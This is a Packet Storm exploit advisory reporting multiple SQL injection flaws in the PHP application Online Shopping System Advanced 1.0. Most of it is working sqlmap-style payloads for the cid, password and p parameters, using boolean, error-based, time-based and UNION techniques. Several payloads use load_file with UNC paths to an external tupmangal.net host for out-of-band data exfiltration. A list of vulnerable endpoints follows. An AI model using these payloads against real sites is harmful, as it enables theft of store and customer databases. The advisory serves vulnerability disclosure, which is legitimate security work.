Online Shopping System Advanced version 1.0 suffers from multiple remote SQL injection vulnerabilities.
414cc67f4209b57356f9ca16624a2e64af6e26d684e648648322df2fd6099299## Title: online-shopping-system-advanced-1.0 SQLi
## Author: nu11secur1ty
## Date: 10.01.2022
## Vendor: https://github.com/PuneethReddyHC/online-shopping-system-advanced
## Software: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/refs/heads/master.zip
## Reference: https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51
The online-shopping-system-advanced-1.0 suffers from multiple SQLi
The attacker can steal all information from the database of this system.
Status: CRITICAL
[+] Exploit:
```MYSQL
Parameter: cid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''
OR NOT 4084=4084 AND 'icSi'='icSi
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''
AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT
(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''
AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select
load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#
```
--------------------------------------------------------------------------------------------
```MYSQL
Parameter: password (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND
(SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT
(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND
(SELECT 7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on
````
--------------------------------------------------------------------------------------------
```MYSQL
Parameter: p (GET)
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)
Payload: p=MAKE_SET(3691=3691,8073)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: p=(SELECT 4211 FROM(SELECT
COUNT(*),CONCAT(0x71706a7171,(SELECT
(ELT(4211=4211,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL > 5.0.12 time-based blind - Parameter replace (heavy
query - comment)
Payload: p=60'+(select
load_file('\\\\9x7re23uz38xdqq4hj8u4e8ba2gv4vzjqmed13ps.tupmangal.net\\eyn'))+'
(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)
```
## All:
```txt
[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php
[cid parameter]]
[1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php
[cid parameter]]
[1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php
[password parameter]]
[1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php
[p parameter]]
[1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php
[p parameter]]
[1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php
[email parameter]]
[1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php
[name parameter]]
```
# Proof and Exploit:
[href](https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed